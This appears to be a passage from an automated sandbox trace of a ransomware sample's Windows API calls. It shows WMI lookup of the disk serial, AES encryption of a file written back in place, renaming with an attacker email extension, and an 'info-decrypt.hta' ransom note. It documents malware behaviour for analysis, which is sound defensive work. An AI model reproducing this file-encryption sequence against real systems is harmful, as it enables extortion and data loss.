[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x601f510) returned 0x0 [0204.316] WbemLocator:IUnknown:QueryInterface (in: This=0x601f510, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0204.317] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f510, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x6027180) returned 0x0 [0204.317] WbemLocator:IUnknown:Release (This=0x601f510) returned 0x0 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x6027180) returned 0x0 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0204.317] WbemLocator:IUnknown:AddRef (This=0x6027180) returned 0x3 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0204.317] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0204.317] CoGetContextToken (in: pToken=0x691e570 | out: pToken=0x691e570) returned 0x0 [0204.317] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0204.317] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x2 [0204.317] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x1 [0204.317] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0204.317] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0204.317] WbemLocator:IUnknown:QueryInterface (in: This=0x6027180, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x6027180) returned 0x0 [0204.317] WbemLocator:IUnknown:AddRef (This=0x6027180) returned 0x3 [0204.317] WbemLocator:IUnknown:Release (This=0x6027180) returned 0x2 [0204.318] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0204.318] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0204.318] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.318] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x60271c0) returned 0x0 [0204.318] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x603331c) returned 0x0 [0204.568] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5ad74) returned 0x0 [0204.568] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ad74, pProxy=0x603331c, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0204.568] WbemLocator:IUnknown:Release (This=0xb5ad74) returned 0x1 [0204.568] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5ad94) returned 0x0 [0204.568] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5ad74) returned 0x0 [0204.569] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ad74, pProxy=0x603331c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.569] WbemLocator:IUnknown:Release (This=0xb5ad74) returned 0x2 [0204.569] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0204.569] CoTaskMemFree (pv=0xbd4a68) [0204.569] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x0 [0204.569] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5ad94) returned 0x0 [0204.569] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0204.570] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0204.570] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0204.570] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0204.572] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0204.633] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5acf4) returned 0x0 [0204.633] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5acf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.633] WbemLocator:IUnknown:Release (This=0xb5acf4) returned 0x3 [0204.633] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0204.633] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0204.633] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5ad7c) returned 0x0 [0204.633] WbemLocator:IRpcOptions:Query (in: This=0xb5ad7c, pPrx=0xb5ad94, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0204.633] WbemLocator:IUnknown:Release (This=0xb5ad7c) returned 0x3 [0204.634] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0204.634] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0204.634] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0204.634] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x603331c) returned 0x0 [0204.634] WbemLocator:IUnknown:AddRef (This=0x603331c) returned 0x4 [0204.634] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x3 [0204.634] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x2 [0204.634] SysStringLen (param_1=0x0) returned 0x0 [0204.634] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0204.634] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0204.634] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.634] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0204.634] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0204.634] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5ad94) returned 0x0 [0204.634] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x3 [0204.634] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0204.634] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0204.634] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.634] IWbemServices:GetObject (in: This=0x603331c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6028180, ppCallResult=0x0) returned 0x0 [0204.709] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0204.709] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0204.709] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0204.709] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3603934*=0, plFlavor=0x3603938*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3603934*=8, plFlavor=0x3603938*=0) returned 0x0 [0204.709] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.709] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.709] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3603934*=8, plFlavor=0x3603938*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3603934*=8, plFlavor=0x3603938*=0) returned 0x0 [0204.709] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.709] SysStringByteLen (bstr="9C354B42") returned 0x10 [0204.709] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", lpFilePart=0x0) returned 0x30 [0204.709] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x53 [0204.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0204.709] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x337549c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0204.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0204.710] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0204.711] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x36 [0204.711] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0204.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0204.711] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32cea980, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32cea980, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32cea980, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0205.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0205.026] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x36 [0205.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0205.026] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), fInfoLevelId=0x0, lpFileInformation=0x3625da8 | out: lpFileInformation=0x3625da8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0205.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0205.026] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x36 [0205.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0205.026] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0205.026] GetFileType (hFile=0x208) returned 0x1 [0205.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0205.027] GetFileType (hFile=0x208) returned 0x1 [0205.027] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x627e [0205.027] ReadFile (in: hFile=0x208, lpBuffer=0x3625fa8, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x3625fa8*, lpNumberOfBytesRead=0x691f33c*=0x627e, lpOverlapped=0x0) returned 1 [0205.254] CloseHandle (hObject=0x208) returned 1 [0205.254] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbe03e8) returned 1 [0205.256] CryptGenRandom (in: hProv=0xbe03e8, dwLen=0x10, pbBuffer=0x362c8ec | out: pbBuffer=0x362c8ec) returned 1 [0205.846] CryptImportKey (in: hProv=0xbe03e8, pbData=0x3772ac8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f4d0) returned 1 [0205.846] CryptContextAddRef (hProv=0xbe03e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.846] CryptContextAddRef (hProv=0xbe03e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.846] CryptDuplicateKey (in: hKey=0xb7f4d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7fb10) returned 1 [0205.846] CryptContextAddRef (hProv=0xbe03e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0205.846] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x4, pbData=0x3772ba8*=0x1, dwFlags=0x0) returned 1 [0205.846] CryptSetKeyParam (hKey=0xb7fb10, dwParam=0x1, pbData=0x3772b74, dwFlags=0x0) returned 1 [0205.846] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3772bb8*, pdwDataLen=0x691f308*=0x6280, dwBufLen=0x6280 | out: pbData=0x3772bb8*, pdwDataLen=0x691f308*=0x6280) returned 1 [0205.847] CryptEncrypt (in: hKey=0xb7fb10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3778e5c*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x3778e5c*, pdwDataLen=0x691f310*=0x10) returned 1 [0205.850] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0205.850] CryptReleaseContext (hProv=0xbe03e8, dwFlags=0x0) returned 1 [0205.850] CryptReleaseContext (hProv=0xbe03e8, dwFlags=0x0) returned 1 [0205.850] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x36 [0205.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0205.850] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0205.852] GetFileType (hFile=0x32c) returned 0x1 [0205.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0205.852] GetFileType (hFile=0x32c) returned 0x1 [0205.852] WriteFile (in: hFile=0x32c, lpBuffer=0x3779478*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x3779478*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0205.853] CloseHandle (hObject=0x32c) returned 1 [0205.854] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0205.854] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0205.854] CoTaskMemFree (pv=0xbed438) [0205.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0205.855] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0205.855] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0205.855] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0205.855] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.857] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x60272b0) returned 0x0 [0205.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0205.857] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 